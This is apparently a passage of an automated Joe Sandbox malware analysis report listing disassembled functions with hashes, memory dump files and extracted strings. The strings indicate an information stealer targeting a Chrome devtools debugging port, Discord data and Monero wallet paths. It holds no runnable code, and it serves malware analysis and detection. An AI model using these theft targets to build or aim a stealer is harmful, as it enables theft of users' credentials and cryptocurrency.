                                                                                                                                                                                                                                                                                            • Instruction ID: 2dfb15c3d7a34687f796f57f95a244542b67be810d33be7b0db8d0fb68874d73
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbd331329f8bb2bceb831a28fc2df1c27ad8248ea6b45105ee1982ca8d8b8535
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E011104810D2E059CB1B8B3540A44A2BFE25DAF10976ED0CDD4D80E3A7C057C58BD736
                                                                                                                                                                                                                                                                                            Function 004199F1 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b460f3035f83cbbba9d533276238d91ef7ad1281ea9d31f2badcc1821dc3679
                                                                                                                                                                                                                                                                                            • Instruction ID: b691467f5e7c21d622a0f36d937084cc18f39bb1aa3a6c626c5826aec042b973
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b460f3035f83cbbba9d533276238d91ef7ad1281ea9d31f2badcc1821dc3679
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B911224810D2E059CB17873540A45A2BFE25DAF10D76ED1CEE4D80E3A7C1ABC59BDB36
                                                                                                                                                                                                                                                                                            Function 0042DC41 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 78cb072e77b3f78788deef64ea31a313593665239a48f9541a136f2ffd3fab69
                                                                                                                                                                                                                                                                                            • Instruction ID: a9769ade8956982e59be8444820f90d7a99b401266dd92afcf0ec356509268ad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 78cb072e77b3f78788deef64ea31a313593665239a48f9541a136f2ffd3fab69
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E611228810D2E059CB17873540A44A6BFE25DAF10E76ED1CDD4D80E3A7C1ABC59BDB26
                                                                                                                                                                                                                                                                                            Function 00430F61 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e774b6c3b19ff005b8515e2b82cd2da44a68ff9a6c4d8c158293a28db6317d8
                                                                                                                                                                                                                                                                                            • Instruction ID: 57f5f67bcb62ebbceebe227056516bfb7aa9f9b5a0089528422f2e3d8eacad2e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e774b6c3b19ff005b8515e2b82cd2da44a68ff9a6c4d8c158293a28db6317d8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4911454800D2E059CB17873540E58A2BFE25DAF10E76ED1CDE4D80E7A7C1ABC55BDB22
                                                                                                                                                                                                                                                                                            Function 0040B4E1 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: /devtools$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-2676143373
                                                                                                                                                                                                                                                                                            • Opcode ID: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
                                                                                                                                                                                                                                                                                            • Instruction ID: 94e44766b1f48ed0313359b6b2832c1626453bbd1d254d7316a7bd8e4186ea0b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8ba058892ff46890d0d8dff12277a57eb397f3e5172dda719e70686d6ed947
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D31EAB67801109FD704DBA8DCC1E6E37BCEBC6714B0C4129E906D3352DA789A65CB59
                                                                                                                                                                                                                                                                                            Function 0042993F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: C$n$\discord\
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-695827262
                                                                                                                                                                                                                                                                                            • Opcode ID: c345ef2812bc68e658e74a74bf69f4bc64b0e86f0f512324dfc0ea04a0b5d0b2
                                                                                                                                                                                                                                                                                            • Instruction ID: 2ed6e5277a763543ee5a6e9ab04d990fc49394e88863e3d643c10f1d4990ae40
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c345ef2812bc68e658e74a74bf69f4bc64b0e86f0f512324dfc0ea04a0b5d0b2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6317176A002149BD210EB9DDC85E9B77EAAFD6314F080034E805D7352D7749E19C7E9
                                                                                                                                                                                                                                                                                            Function 004284DB Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: %s\%s\%s$Files$<E
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-4166326729
                                                                                                                                                                                                                                                                                            • Opcode ID: 7f4d2d494edd50ffecfecc01823f6e7a19626eb51f66771e39c5d06c7254cddb
                                                                                                                                                                                                                                                                                            • Instruction ID: 0717042b4f25f8a29bf6635a1133c4f2e9fe49c06dca74608bab38cd810ebc2b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7f4d2d494edd50ffecfecc01823f6e7a19626eb51f66771e39c5d06c7254cddb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 832126B7A00215ABD704CF58DC82D9633A9FB95305B094039E506A7702F678BF5A8BE8
                                                                                                                                                                                                                                                                                            Function 004011B9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memset
                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$qqt$wallet_path
                                                                                                                                                                                                                                                                                            • API String ID: 2221118986-2179174401
                                                                                                                                                                                                                                                                                            • Opcode ID: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
                                                                                                                                                                                                                                                                                            • Instruction ID: 7a2c87307ec0540e7d715f3f6b37445b2dbc1dc42b57d5ae72fd3d8d753b74c4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6547e106f19dbda9d7c1aadcfe2a743e189930704852a13bb4a66418b43e7448
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901C4757101006BD308E758EC8AE3F37AEE7C6755F48402EF805E7742EAE8A919876D